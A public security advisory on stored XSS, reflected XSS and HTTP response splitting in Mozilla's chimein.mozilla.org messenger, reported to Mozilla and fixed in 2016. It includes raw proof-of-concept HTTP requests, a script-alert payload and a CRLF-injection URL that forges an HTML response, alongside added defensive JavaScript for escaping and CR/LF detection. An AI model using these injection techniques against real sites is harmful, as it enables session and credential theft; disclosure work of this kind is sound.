Chimein.mozilla.org Cross Site Scripting

Posted Apr 3, 2017
Authored by Yann CAM

Chimein.mozilla.org suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | 7ba9f4a4d61281bba898e7e5feaf31b6

######################################################################
# Exploit Title: Mozilla.org sub-domain Stored-XSS - Reflected-XSS - HTTP Response Splitting
# Date: 03/04/2017
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.mozilla.org
# Version: /
# Category: Stored Cross Site Scripting / Reflected Cross Site Scripting / HTTP Response Splitting
# Google dork:
# Tested on: mozilla.org chimein sub-domain
######################################################################

Mozilla description:
======================================================================

Mozilla is a free-software community, created in 1998 by members of Netscape. The Mozilla community uses, develops, spreads and supports Mozilla products,
thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla
Foundation and its tax-paying subsidiary, the Mozilla Corporation.

Mozilla produces many products such as the Firefox web browser, Thunderbird e-mail client, Firefox Mobile web browser, Firefox OS mobile operating system,
Bugzilla bug tracking system and other projects.


Vulnerability description:
======================================================================

The chimein.mozilla.org sub-domain (accessed via HTTPS) provides a secure web messenger application. This application requires authentication.
Each user is authenticated with a login and password. Then, to send a message to another user, a public/private key pair is used to encrypt and sign the message.
The private key is protected by a passphrase.

This secure web messenger application contains several vulnerabilities:

- A stored XSS is present in the body of each message sent encrypted to other users.
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla users' credentials such as keys and passwords.

- A reflected XSS is present in the sign up process (login field).
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla users' credentials such as keys and passwords.

- An HTTP Response Splitting vulnerability is present in the "/message/get" endpoint.
It can be used to create a reflected XSS.


Proof of Concept No. 1: Stored Cross-Site Scripting
======================================================================

The chimein.mozilla.org domain (https://chimein.mozilla.org/) provides a very simple "sign up / sign in / send message" process with asymmetric encryption (public key,
private key, password and passphrase) intended to add strong security to message exchange.

A regular user can create an account, log in with this account, and send encrypted messages (protected with a passphrase) to any other registered user.
There are several XSS vulnerabilities. The most critical is a Stored-XSS in the body of any message. A user is able to create an account as described here:

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png

Login = ycam, password = ycam, passphrase = ycam

Then, once logged in, the user can send an arbitrary message to any other user (in the example, the message is sent to the user himself for the Proof of Concept):

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png

The Stored-XSS payload can be injected in the "body" of the message. The user chooses a specific passphrase, so the payload is stored encrypted.
Once sent, the message is visible to the logged-in recipient. When this victim user clicks on the message, he has to enter the passphrase used at encryption time.

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png

When the passphrase is entered, the body of the message is decrypted and the Stored-XSS is triggered (PoC: alert(document.domain)).

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png

Stored-XSS is a very critical class of vulnerability and can be used by an attacker to steal private information such as session cookies or credentials. Through XSS, an attacker
can tamper with page rendering, take control of the whole browser and use browser exploits to gain privileges on the local system (especially with a dedicated
XSS exploitation framework like BeEF: http://beefproject.com/).

This Stored-XSS was tested successfully with the latest Firefox version 49.0.2, the latest Chrome version 53 and the latest IE version 11.

In this case, the main Stored-XSS is embedded in a personal message addressed to a victim (the victim needs to enter the passphrase to decrypt the message body and
trigger the payload). This is a serious issue because the XSS is located in a supposedly very secure chat system built on asymmetric encryption.
An attacker would be able to create a fake page, fake prompt or fake "re-authentication" process to steal the victim's password. If the attacker gains access to a victim's
account, he can use all the features of the secure chat in place of the legitimate user.
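The rendering mistake behind this finding, as an added JavaScript example (not chimein's code; the helper names and the sample message are constructed for illustration): decryption does not make the body trusted, so it must reach the DOM as text, never as HTML.

```javascript
// Added example, not chimein's code. escapeHtml(), renderMessageUnsafe(),
// renderMessageSafe() and containsMarkup() are hypothetical helpers.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape the five characters that can break out of an HTML text node or attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable pattern: the decrypted plaintext is concatenated into markup that is
// later assigned to innerHTML, so any tag inside the body runs in the viewer's browser.
function renderMessageUnsafe(msg) {
  return `<div class="subject">${msg.subject}</div><div class="body">${msg.body}</div>`;
}

// Hardened pattern: every untrusted field is escaped before it reaches the DOM.
// (In a real page, prefer element.textContent = msg.body over building HTML strings.)
function renderMessageSafe(msg) {
  return `<div class="subject">${escapeHtml(msg.subject)}</div><div class="body">${escapeHtml(msg.body)}</div>`;
}

// Post-decryption check a client could log or alert on: a secure-messenger body is
// expected to be plain text, so the presence of an HTML tag is suspicious.
function containsMarkup(plaintext) {
  return /<\s*\/?\s*[a-zA-Z][^>]*>/.test(String(plaintext));
}

// Constructed sample: a decrypted message carrying the page's PoC payload.
const decryptedSample = {
  subject: "ycam",
  body: "hello <script>alert(document.domain)</script>",
};
```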

PoC - HTTP request sample (with encrypted payload):

POST /message/create HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://chimein.mozilla.org/
Content-Length: 1483
Content-Type: text/plain;charset=UTF-8
DNT: 1
Connection: close

login=ycam&password=ycam&sender=ycam&recipient=ycam&subject=ycam&subject_signature=C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E%0D%0A%2FPMRAbK6IZF9O9G%2BkOmy9a%2FmSPY9L8yiFdwk8CXzW%2Fnvmirx3qelwQ87z3cgrxGe8um7Ntc603h2%0D%0AWrux3wQrv5JptqEMC1Cj%2BatQQQ%2FB6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI%0D%0AKpy%2F0TgJhkpWj%2BPO3YIvxy015imeISUgmZyTmOaJAy7%2FOQzvw5GUAS5nTG%2FtU79kO7AlhQLTgjlL%0D%0AE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw%3D%3D&body=O8E%2BSCVlBZiL8xsg0yEg%2BK5%2BjdHKkuQA89z8FpLDekOT3CUa43B%2FQw%2BBxyCTgccngdRp7en7Zi%2BM%0D%0AwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK&body_signature=kFLh%2BgNR1Ow2zuxqRebnYmiB%2FN2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z%2BYF13e%0D%0AzyWBWtwmSPff%2B6JFWIHGqYI2RR%2BqszbAduHwHSniFPkz0gKntc%2FxOe8GFX62z78pAPJfZ4tLyg8p%0D%0ALobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt%2B6t7GkCWf799ztY8R0WYJ8q%0D%0AskQAYD5LuHpdadi8%2B8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj%2BF9z8KFgc%0D%0AvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ%3D%3D&session_key=a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG%2BMmtmZjcwAPJjXePxH8%2F1XWWolhPn1fRmf4j9ybmo%0D%0AlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM%0D%0ATxVPIcT%2FvLbjTA0hrnzmm%2Ftiyq31YPVOYq3Di95urw38DFJIRPKiP%2FcJ0GoWkUrcB6OK8lCfvx0K%0D%0AWsS%2BPpAB%2Fc1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ%2B2AkjhwcNzqWHQb%0D%0AHHm1wN6fkalHKXW7%2BwM2ctioB1JaE3gYE7WmGA%3D%3D&session_key_iv=zOtfAHFpmaW%2Bhm2xcJhPxw%3D%3D&


Proof of Concept No. 2: Reflected Cross-Site Scripting
======================================================================

There is another reflected XSS vulnerability in the "login" text input during registration (the user login must be new at each sign up):

Payload injection:
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png

Reflected XSS fired:
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png


Proof of Concept No. 3: HTTP Response Splitting leveraged into Reflected XSS
======================================================================

Message exchanges are made through API calls; for example, when a user POSTs a message, the "/message/create" endpoint is called.
Messages are listed via "/message/list", and to read a specific message the following request is made (as an example, message ID 57 owned by
the user ycam with password ycam, used as the Proof of Concept):

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

login=ycam&password=ycam&id=57

The response is a JSON document like:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 1525
Date: Fri, 21 Oct 2016 00:05:14 GMT
Connection: close

{"id":57,"sender":"ycam","recipient":"ycam","subject":"ycam","subject_signature":"C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E\r\n/PMRAbK6IZF9O9G+kOmy9a/mSPY9L8yiFdwk8CXzW/nvmirx3qelwQ87z3cgrxGe8um7Ntc603h2\r\nWrux3wQrv5JptqEMC1Cj+atQQQ/B6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI\r\nKpy/0TgJhkpWj+PO3YIvxy015imeISUgmZyTmOaJAy7/OQzvw5GUAS5nTG/tU79kO7AlhQLTgjlL\r\nE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw==","body":"O8E+SCVlBZiL8xsg0yEg+K5+jdHKkuQA89z8FpLDekOT3CUa43B/Qw+BxyCTgccngdRp7en7Zi+M\r\nwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK","body_signature":"kFLh+gNR1Ow2zuxqRebnYmiB/N2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z+YF13e\r\nzyWBWtwmSPff+6JFWIHGqYI2RR+qszbAduHwHSniFPkz0gKntc/xOe8GFX62z78pAPJfZ4tLyg8p\r\nLobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt+6t7GkCWf799ztY8R0WYJ8q\r\nskQAYD5LuHpdadi8+8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj+F9z8KFgc\r\nvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ==","session_key":"a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG+MmtmZjcwAPJjXePxH8/1XWWolhPn1fRmf4j9ybmo\r\nlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM\r\nTxVPIcT/vLbjTA0hrnzmm/tiyq31YPVOYq3Di95urw38DFJIRPKiP/cJ0GoWkUrcB6OK8lCfvx0K\r\nWsS+PpAB/c1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ+2AkjhwcNzqWHQb\r\nHHm1wN6fkalHKXW7+wM2ctioB1JaE3gYE7WmGA==","session_key_iv":"zOtfAHFpmaW+hm2xcJhPxw==","status":"read","sent_date":"2016-10-20T23:05:30.009Z","retrieved_date":"2016-10-20T23:06:45.811Z","read_date":"2016-10-20T23:06:48.066Z"}

Screenshot:
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png

If a user changes the value of the "id" POST parameter of the initial request, the following error is returned:

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

login=ycam&password=ycam&id=xxx

Error received:

HTTP/1.1 500 message xxx does not exist
Date: Fri, 21 Oct 2016 00:07:11 GMT
Connection: close
Content-Length: 0

Screenshot:
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png

The "id" value is reflected unescaped in the status line (reason phrase) of the HTTP response returned by the server.

With the sequence %0a%0d (line-feed and carriage-return characters), an attacker can forge headers and response content himself:

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

login=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d

Response:

HTTP/1.1 500 message xxx
yyy
zzz
does not exist
Date: Fri, 21 Oct 2016 00:08:40 GMT
Connection: close
Content-Length: 0

Screenshot:
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png

So, with a specific payload, an attacker can forge his own response from the server with the headers of his choice (Content-Type: text/html)
and an arbitrary body. Moreover, the payload can be sent either as a GET or as a POST parameter. Via GET, the vulnerability is easier
to deliver to victims:

https://chimein.mozilla.org/message/get?login=ycam&password=ycam&id=x%0a%0dContent-Length: 100%0a%0dContent-Type: text/html%0a%0d%0a%0d<html><body><script>alert(document.domain)</script></body></html><!--

Or hidden behind the bit.ly URL shortener:

https://mzl.la/2eypf8b

Screenshot:
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png

Tested successfully with the latest Firefox version 49.0.2.

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to
properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and
similar exploits.
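An added JavaScript example (not chimein's code; the function names are hypothetical and the vulnerable pattern is reconstructed from the responses shown above) of how a reason phrase built from the "id" parameter splits the response, the hardened alternative, and a CR/LF check a defender can apply to request parameters in a WAF rule or during log review.

```javascript
// Added example, not chimein's code. All functions below are hypothetical.

// Vulnerable pattern, reconstructed from the observed response
// "HTTP/1.1 500 message xxx does not exist": the raw id lands in the status line,
// so CR/LF characters inside it terminate the line and start new ones.
function buildErrorStatusUnsafe(id) {
  return `HTTP/1.1 500 message ${id} does not exist\r\n`;
}

// Hardened pattern: validate id as a decimal integer, keep a fixed reason phrase,
// and put the detail in a JSON body where it can never become a header.
function buildErrorResponseSafe(id) {
  if (!/^\d{1,18}$/.test(String(id))) {
    return { status: 400, reason: "Bad Request", body: JSON.stringify({ error: "invalid message id" }) };
  }
  return {
    status: 404,
    reason: "Not Found",
    body: JSON.stringify({ error: "message does not exist", id: Number(id) }),
  };
}

// Detection helper: does a parameter value contain CR or LF once URL-decoded
// (the %0a / %0d sequences shown in the advisory)? Malformed encodings keep the raw value.
function hasCrlfInjection(rawValue) {
  let decoded = String(rawValue);
  try { decoded = decodeURIComponent(decoded); } catch (_) { /* keep raw on bad encoding */ }
  return /[\r\n]/.test(decoded);
}

// Split raw response text into its lines, to make the injected lines visible.
function splitResponseLines(text) {
  return text.split(/[\r\n]+/).filter((l) => l.length > 0);
}
```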

Screenshots:
======================================================================

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png


Solution:
======================================================================

Fixed by the Mozilla security team: the DNS entry "chimein.mozilla.org" was deleted.


Additional resources / article and screenshots:
======================================================================

- https://www.mozilla.org
- https://bugzilla.mozilla.org/show_bug.cgi?id=1311883
- https://bugzilla.mozilla.org/show_bug.cgi?id=1311887
- https://bugzilla.mozilla.org/show_bug.cgi?id=1312034
- https://www.mozilla.org/en-US/security/bug-bounty/web-hall-of-fame/
- http://www.asafety.fr
- http://www.synetis.com
- https://www.asafety.fr/vuln-exploit-poc/contribution-mozilla-http-response-splitting-reflected-stored-xss/


Report timeline:
======================================================================

2016-10-20: Mozilla security team alerted with details and PoC (via 2 Bugzilla submissions)
2016-10-21: Mozilla response; issues fixed via DNS entry deletion
2016-10-21: Mozilla acknowledgement (out of scope for the Bug Bounty, but eligible for some goodies)
2017-04-03: Mozilla acknowledgement on the Mozilla Web and Services Hall of Fame (2016Q4)
2017-04-04: Public advisory

Credits:
======================================================================

Synetis
www.synetis.com
Consulting firm in management and information security

Yann CAM - Security Consultant @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr
